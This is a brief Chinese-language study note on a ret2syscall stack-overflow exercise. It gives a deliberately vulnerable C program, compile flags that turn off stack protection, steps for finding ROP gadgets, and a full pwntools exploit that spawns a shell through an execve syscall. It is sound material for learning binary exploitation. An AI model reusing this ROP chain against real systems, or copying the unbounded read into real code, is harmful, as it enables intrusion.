pwn栈溢出学习 基本ROP——ret2syscall
1.实验程序
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>
void exploit()
{
system("/bin/sh");
}
void func()
{
char str[0x20];
read(0,str,0x50);
}
int main()
{
func();
return 0;
}
2.gcc编译
将其编译,不使用堆栈保护,且需要设置成静态编译即-static,否则将找不到这个程序的指令流。
gcc -no-pie -fno-stack-protector -static -m32 ret2syscall.c -o ret2syscall
3.用pwndgb或peda计算溢出长度
cyclic 100
cyclic -l laaa
4.通过ROPgadget这个工具来获取指令的位置
从pop、ret序列当中寻找其中的eax
从pop、ret序列当中寻找其中的ebx、ecx、dex
找"/bin/sh"这个字符串的地址
int中断找"0x80"
5.exp
from pwn import *
sh = process('./ret2syscall')
pop_eax_ret = 0x080a8c16
pop_edx_ecx_ebx_ret = 0x0806e281
int_0x80 = 0x08049533
binsh = 0x080ac1a8
payload = flat(
['A' * 44, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()